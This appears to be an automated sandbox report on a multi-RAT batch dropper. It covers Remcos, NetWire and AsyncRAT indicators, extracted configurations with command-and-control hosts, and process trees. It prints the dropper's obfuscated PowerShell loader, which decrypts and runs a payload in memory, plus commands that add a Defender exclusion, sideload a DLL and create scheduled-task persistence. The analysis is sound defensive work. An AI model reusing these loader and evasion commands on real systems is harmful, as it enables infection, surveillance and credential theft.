asyncrat | 7361111dc12ff526cb5391edfadb0a9ce69e75ba8d12b31122b224f9644290c0

Analysis

max time kernel
149s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
04-01-2023 06:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mynew.bat
Size

49KB
MD5

f010a779fc5fa3c0d6ef8d08cf2f82c3
SHA1

37dec5efe2443e43a4290473b372a40bd9f494f9
SHA256

7361111dc12ff526cb5391edfadb0a9ce69e75ba8d12b31122b224f9644290c0
SHA512

b76595be308c2e5c23e1f7e578573b1e108885d868a34ae10f18756de7f27f9be1beebc31b2e8275851bfa898f1a15b758ce3f903e7c888895a7779471670db8
SSDEEP

768:m/7oBdu40Ozbblz1Osan4ha4j0YJDH7bzzE1k07LEHZMIXlOJFt0X495YrS8ra:aEBvHblRI4hJDHnk1dvEVwJL649O2

Score

10^/10

asyncrat modiloader netwire remcos dec2022 botnet persistence rat spyware stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

DEC2022

retsuportm.ddnsfree.com:2404

spreadrem1.ddnsfree.com:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
EXAMPLE.exe
copy_folder
EXAMPLE
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
YHGFTRDE.dat
keylog_flag
false
mouse_option
false
mutex
HPLKVPJH-J4G225
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

netwire

febnew2.ddns.net:6655

febnew1.ddns.net:6655

febnew4.ddns.net:6655

febnew5.ddns.net:6655

Attributes

activex_autorun
false
copy_executable
false
delete_original
false
host_id
HostId-%Rand%
install_path
%AppData%\Install\Host.exe
lock_executable
false
offline_keylogger
false
password
1234
registry_autorun
false
use_mutex
false

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

NetWire RAT payload 6 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/760-194-0x0000000000400000-0x0000000000445000-memory.dmp	netwire
behavioral2/memory/760-197-0x0000000000400000-0x0000000000445000-memory.dmp	netwire
behavioral2/memory/760-198-0x0000000000400000-0x0000000000444095-memory.dmp	netwire
behavioral2/memory/760-202-0x0000000000400000-0x0000000000444095-memory.dmp	netwire
behavioral2/memory/2040-225-0x0000000000400000-0x0000000000445000-memory.dmp	netwire
behavioral2/memory/2040-227-0x0000000000400000-0x0000000000444095-memory.dmp	netwire

Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

ModiLoader Second Stage 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3200-147-0x0000000000A20000-0x0000000000A4F000-memory.dmp	modiloader_stage2
behavioral2/memory/5108-186-0x0000000002270000-0x000000000229F000-memory.dmp	modiloader_stage2
behavioral2/memory/2532-205-0x00000000021D0000-0x00000000021FF000-memory.dmp	modiloader_stage2

Executes dropped EXE 9 IoCs

Processes:

mynew.bat.exembekur.exeeasinvoker.exembekur.exejjweiy.exejjweiy.exeHost.exedhylty.bat.exeHost.exe

pid process

4536 mynew.bat.exe
3200 mbekur.exe
1716 easinvoker.exe
2964 mbekur.exe
5108 jjweiy.exe
760 jjweiy.exe
2532 Host.exe
1200 dhylty.bat.exe
2040 Host.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mynew.bat.exejjweiy.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	mynew.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	jjweiy.exe

Loads dropped DLL 1 IoCs

Processes:

easinvoker.exe

pid process

1716 easinvoker.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1716	easinvoker.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mbekur.exejjweiy.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oxzfbvmf = "C:\\Users\\Public\\Libraries\\fmvbfzxO.url"	mbekur.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Takipqpe = "C:\\Users\\Public\\Libraries\\epqpikaT.url"	jjweiy.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

58 api.ipify.org
59 api.ipify.org

flow	ioc
58	api.ipify.org
59	api.ipify.org

Suspicious use of SetThreadContext 3 IoCs

Processes:

mbekur.exejjweiy.exeHost.exe

description	pid	process	target process
PID 3200 set thread context of 2964	3200	mbekur.exe	mbekur.exe
PID 5108 set thread context of 760	5108	jjweiy.exe	jjweiy.exe
PID 2532 set thread context of 2040	2532	Host.exe	Host.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4932 schtasks.exe

pid	process
4932	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exexcopy.exexcopy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

876 PING.EXE

pid	process
876	PING.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

mynew.bat.exepowershell.exepowershell.exepowershell.exepowershell.exedhylty.bat.exe

pid	process
4536	mynew.bat.exe
4536	mynew.bat.exe
1732	powershell.exe
1732	powershell.exe
960	powershell.exe
960	powershell.exe
3444	powershell.exe
3444	powershell.exe
1420	powershell.exe
1420	powershell.exe
1200	dhylty.bat.exe
1200	dhylty.bat.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

mbekur.exe

pid process

2964 mbekur.exe

pid	process
2964	mbekur.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

mynew.bat.exepowershell.exepowershell.exepowershell.exepowershell.exedhylty.bat.exe

description	pid	process
Token: SeDebugPrivilege	4536	mynew.bat.exe
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeDebugPrivilege	960	powershell.exe
Token: SeDebugPrivilege	3444	powershell.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeDebugPrivilege	1200	dhylty.bat.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

dhylty.bat.exe

pid process

1200 dhylty.bat.exe
1200 dhylty.bat.exe
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

dhylty.bat.exe

pid process

1200 dhylty.bat.exe
1200 dhylty.bat.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

mbekur.exedhylty.bat.exe

pid process

2964 mbekur.exe
1200 dhylty.bat.exe

pid	process
1200	dhylty.bat.exe
1200	dhylty.bat.exe

pid	process
1200	dhylty.bat.exe
1200	dhylty.bat.exe

pid	process
2964	mbekur.exe
1200	dhylty.bat.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exemynew.bat.execmd.exepowershell.exembekur.execmd.exeeasinvoker.execmd.execmd.exepowershell.exejjweiy.exejjweiy.execmd.exepowershell.execmd.exe

description	pid	process	target process
PID 3684 wrote to memory of 4536	3684	cmd.exe	mynew.bat.exe
PID 3684 wrote to memory of 4536	3684	cmd.exe	mynew.bat.exe
PID 4536 wrote to memory of 1440	4536	mynew.bat.exe	cmd.exe
PID 4536 wrote to memory of 1440	4536	mynew.bat.exe	cmd.exe
PID 1440 wrote to memory of 1732	1440	cmd.exe	powershell.exe
PID 1440 wrote to memory of 1732	1440	cmd.exe	powershell.exe
PID 1732 wrote to memory of 3200	1732	powershell.exe	mbekur.exe
PID 1732 wrote to memory of 3200	1732	powershell.exe	mbekur.exe
PID 1732 wrote to memory of 3200	1732	powershell.exe	mbekur.exe
PID 3200 wrote to memory of 3344	3200	mbekur.exe	cmd.exe
PID 3200 wrote to memory of 3344	3200	mbekur.exe	cmd.exe
PID 3200 wrote to memory of 3344	3200	mbekur.exe	cmd.exe
PID 3344 wrote to memory of 860	3344	cmd.exe	cmd.exe
PID 3344 wrote to memory of 860	3344	cmd.exe	cmd.exe
PID 3344 wrote to memory of 860	3344	cmd.exe	cmd.exe
PID 3344 wrote to memory of 2580	3344	cmd.exe	xcopy.exe
PID 3344 wrote to memory of 2580	3344	cmd.exe	xcopy.exe
PID 3344 wrote to memory of 2580	3344	cmd.exe	xcopy.exe
PID 3344 wrote to memory of 2892	3344	cmd.exe	cmd.exe
PID 3344 wrote to memory of 2892	3344	cmd.exe	cmd.exe
PID 3344 wrote to memory of 2892	3344	cmd.exe	cmd.exe
PID 3344 wrote to memory of 3828	3344	cmd.exe	xcopy.exe
PID 3344 wrote to memory of 3828	3344	cmd.exe	xcopy.exe
PID 3344 wrote to memory of 3828	3344	cmd.exe	xcopy.exe
PID 3344 wrote to memory of 2612	3344	cmd.exe	cmd.exe
PID 3344 wrote to memory of 2612	3344	cmd.exe	cmd.exe
PID 3344 wrote to memory of 2612	3344	cmd.exe	cmd.exe
PID 3344 wrote to memory of 3184	3344	cmd.exe	xcopy.exe
PID 3344 wrote to memory of 3184	3344	cmd.exe	xcopy.exe
PID 3344 wrote to memory of 3184	3344	cmd.exe	xcopy.exe
PID 3344 wrote to memory of 1716	3344	cmd.exe	easinvoker.exe
PID 3344 wrote to memory of 1716	3344	cmd.exe	easinvoker.exe
PID 1716 wrote to memory of 4124	1716	easinvoker.exe	cmd.exe
PID 1716 wrote to memory of 4124	1716	easinvoker.exe	cmd.exe
PID 3344 wrote to memory of 876	3344	cmd.exe	PING.EXE
PID 3344 wrote to memory of 876	3344	cmd.exe	PING.EXE
PID 3344 wrote to memory of 876	3344	cmd.exe	PING.EXE
PID 4124 wrote to memory of 960	4124	cmd.exe	powershell.exe
PID 4124 wrote to memory of 960	4124	cmd.exe	powershell.exe
PID 3200 wrote to memory of 2964	3200	mbekur.exe	mbekur.exe
PID 3200 wrote to memory of 2964	3200	mbekur.exe	mbekur.exe
PID 3200 wrote to memory of 2964	3200	mbekur.exe	mbekur.exe
PID 3200 wrote to memory of 2964	3200	mbekur.exe	mbekur.exe
PID 4536 wrote to memory of 1476	4536	mynew.bat.exe	cmd.exe
PID 4536 wrote to memory of 1476	4536	mynew.bat.exe	cmd.exe
PID 1476 wrote to memory of 3444	1476	cmd.exe	powershell.exe
PID 1476 wrote to memory of 3444	1476	cmd.exe	powershell.exe
PID 3444 wrote to memory of 5108	3444	powershell.exe	jjweiy.exe
PID 3444 wrote to memory of 5108	3444	powershell.exe	jjweiy.exe
PID 3444 wrote to memory of 5108	3444	powershell.exe	jjweiy.exe
PID 5108 wrote to memory of 760	5108	jjweiy.exe	jjweiy.exe
PID 5108 wrote to memory of 760	5108	jjweiy.exe	jjweiy.exe
PID 5108 wrote to memory of 760	5108	jjweiy.exe	jjweiy.exe
PID 5108 wrote to memory of 760	5108	jjweiy.exe	jjweiy.exe
PID 760 wrote to memory of 2532	760	jjweiy.exe	Host.exe
PID 760 wrote to memory of 2532	760	jjweiy.exe	Host.exe
PID 760 wrote to memory of 2532	760	jjweiy.exe	Host.exe
PID 4536 wrote to memory of 3808	4536	mynew.bat.exe	cmd.exe
PID 4536 wrote to memory of 3808	4536	mynew.bat.exe	cmd.exe
PID 3808 wrote to memory of 1420	3808	cmd.exe	powershell.exe
PID 3808 wrote to memory of 1420	3808	cmd.exe	powershell.exe
PID 1420 wrote to memory of 2316	1420	powershell.exe	cmd.exe
PID 1420 wrote to memory of 2316	1420	powershell.exe	cmd.exe
PID 2316 wrote to memory of 1200	2316	cmd.exe	dhylty.bat.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\mynew.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3684

C:\Users\Admin\AppData\Local\Temp\mynew.bat.exe
"mynew.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $Hnouz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\mynew.bat').Split([Environment]::NewLine);foreach ($aOvdy in $Hnouz) { if ($aOvdy.StartsWith(':: ')) { $VFBbN = $aOvdy.Substring(3); break; }; };$APbgZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFBbN);$TxOqK = New-Object System.Security.Cryptography.AesManaged;$TxOqK.Mode = [System.Security.Cryptography.CipherMode]::CBC;$TxOqK.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$TxOqK.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OHLMkWak0mShc6SWbTBetVDMdS/ZPNqnInWDRzUQwCY=');$TxOqK.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QyA1AR4yRiYXGDMq0ZKCyQ==');$mOLfG = $TxOqK.CreateDecryptor();$APbgZ = $mOLfG.TransformFinalBlock($APbgZ, 0, $APbgZ.Length);$mOLfG.Dispose();$TxOqK.Dispose();$nIAlk = New-Object System.IO.MemoryStream(, $APbgZ);$GUMsr = New-Object System.IO.MemoryStream;$ourVj = New-Object System.IO.Compression.GZipStream($nIAlk, [IO.Compression.CompressionMode]::Decompress);$ourVj.CopyTo($GUMsr);$ourVj.Dispose();$nIAlk.Dispose();$GUMsr.Dispose();$APbgZ = $GUMsr.ToArray();$uPpYS = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($APbgZ);$vzwYm = $uPpYS.EntryPoint;$vzwYm.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4536

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mbekur.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mbekur.exe"'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1732

C:\Users\Admin\AppData\Local\Temp\mbekur.exe
"C:\Users\Admin\AppData\Local\Temp\mbekur.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3200

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\OxzfbvmfO.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:3344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
7⤵
PID:860

C:\Windows\SysWOW64\xcopy.exe
xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
7⤵
- Enumerates system info in registry
PID:2580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
7⤵
PID:2892

C:\Windows\SysWOW64\xcopy.exe
xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
7⤵
- Enumerates system info in registry
PID:3828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
7⤵
PID:2612

C:\Windows\SysWOW64\xcopy.exe
xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y
7⤵
- Enumerates system info in registry
PID:3184

C:\Windows \System32\easinvoker.exe
"C:\Windows \System32\easinvoker.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
8⤵
- Suspicious use of WriteProcessMemory
PID:4124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:960

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 6
7⤵
- Runs ping.exe
PID:876

C:\Users\Admin\AppData\Local\Temp\mbekur.exe
"C:\Users\Admin\AppData\Local\Temp\mbekur.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jjweiy.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jjweiy.exe"'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3444

C:\Users\Admin\AppData\Local\Temp\jjweiy.exe
"C:\Users\Admin\AppData\Local\Temp\jjweiy.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5108

C:\Users\Admin\AppData\Local\Temp\jjweiy.exe
"C:\Users\Admin\AppData\Local\Temp\jjweiy.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:760

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2532

C:\Users\Admin\AppData\Roaming\Install\Host.exe
"C:\Users\Admin\AppData\Roaming\Install\Host.exe"
8⤵
- Executes dropped EXE
PID:2040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\dhylty.bat"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:3808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\dhylty.bat"'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dhylty.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:2316

C:\Users\Admin\AppData\Local\Temp\dhylty.bat.exe
"dhylty.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $AXUkl = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\dhylty.bat').Split([Environment]::NewLine);foreach ($nOPQh in $AXUkl) { if ($nOPQh.StartsWith(':: ')) { $HPzIn = $nOPQh.Substring(3); break; }; };$xWiBK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($HPzIn);$KChVS = New-Object System.Security.Cryptography.AesManaged;$KChVS.Mode = [System.Security.Cryptography.CipherMode]::CBC;$KChVS.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$KChVS.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XW1/OClWDve6Edb4EFAPZMdLe56JDSmtEzYudqGm378=');$KChVS.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F5W/JJjAW9BS5IMGApFnNw==');$UHtkB = $KChVS.CreateDecryptor();$xWiBK = $UHtkB.TransformFinalBlock($xWiBK, 0, $xWiBK.Length);$UHtkB.Dispose();$KChVS.Dispose();$PLWwk = New-Object System.IO.MemoryStream(, $xWiBK);$pxfaJ = New-Object System.IO.MemoryStream;$PkfiQ = New-Object System.IO.Compression.GZipStream($PLWwk, [IO.Compression.CompressionMode]::Decompress);$PkfiQ.CopyTo($pxfaJ);$PkfiQ.Dispose();$PLWwk.Dispose();$pxfaJ.Dispose();$xWiBK = $pxfaJ.ToArray();$hrwta = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($xWiBK);$stuRW = $hrwta.EntryPoint;$stuRW.Invoke($null, (, [string[]] ('')))
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1200

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\dhylty.bat.exe" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:4932

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
Filesize
471B

MD5
754711319399d090fd83609c28768137

SHA1
9733fc959a8fe4bcb71d761e62e8eae9e3bb29a7

SHA256
faa2fc7e8f87dc56ba6ba03f3f2d535277f2db38d561cfb67e103631c96287f7

SHA512
106f3978e9e0a2edfac6a57c95c3a6cd99b0d7a9ea7d5aba6fa374a31693be33b99eaa80874a284d71eb03a5b8b4ef1dec542202c05116f5ef050f8f769de1d7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53
Filesize
471B

MD5
c136901c2a0696f7a5f4f45ba8725699

SHA1
a319de4877fc337bf0d9e9366c4060e306e1be0d

SHA256
d1fb0a203dfd0d3f900b66de6bc827fcefa90d39e291ef1a7c580ce83faef63d

SHA512
3bf064914a874a96834c35e0859f4338c1422e9cecb913d591aa9ce341da2e4976ed428f3a00f985b699787f118d1558c881b8aa1d102e3da0adbdaf476f5c50

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
Filesize
412B

MD5
4aead5217b122334672f2034e460c097

SHA1
da04f5c67d2e95b7123017c1d38428a14ddbaba4

SHA256
91d3257e30f2fb8b3603ba8f8fd4bd7573e7d908a928ebd5f970039b5505ceac

SHA512
60a389f87db4c715400570fb0c1a8df0d17f0a84d1cd2eb3a5c050a87d81b2c47044ddaad647a04c6e226c80f8805f477d7cff4a95ded3c9c04b189f6074bb5b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53
Filesize
442B

MD5
0b88eee4a66ec67db4df40c29f1f71e1

SHA1
2cfb80792ce5ddbd13d837f1ac9c0c189346d84a

SHA256
5e52f871f1b84209c4d549fab9bfa8e871114bcfb54d9ada82e729ad58cba2b3

SHA512
e7397ae2354c11314a013b0a5382b3e6f718af450df3c2f59e1fb5a47c85747f12e29edbe6581a23b1dd53c3a9a7bfa7ad4cedd35ee973af71c49ce15f3061e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\dhylty.bat
Filesize
325KB

MD5
c3a6545c16eee6297947ed8620de4717

SHA1
4debd4e38ad82335e0a6eea50a52259cf3ccf4ae

SHA256
3152854e19471a68674c0e8c61822a78e4c5fc159c03f9635b647570a4d91ddb

SHA512
3dd9e1f43e67bf52b311f18afc8adce4ee3086ab226532453a559a0e644c6772ea4bf3fa25c54a917486156b9c0014c2296e9f58e8b7e4f49033cef967e215a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\dhylty.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\dhylty.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\jjweiy.exe
Filesize
822KB

MD5
775a301382aacf4b63ff30d3f96064d1

SHA1
259a6cc69706fb89db2aaa52f3f05f62b683dd03

SHA256
f10974dce5ad70d94973673dec2e92001a251cbf488a86faf3007180bbb1e04f

SHA512
048f637a8b1d807bb4c606795b526a14a05381c257d5118a6b9180ff7b7862274a8607fee9ef19ee8f07b533178b546a62835052d3b2fdddc0aeb42b43f3a19c

Download Submit
C:\Users\Admin\AppData\Local\Temp\jjweiy.exe
Filesize
822KB

MD5
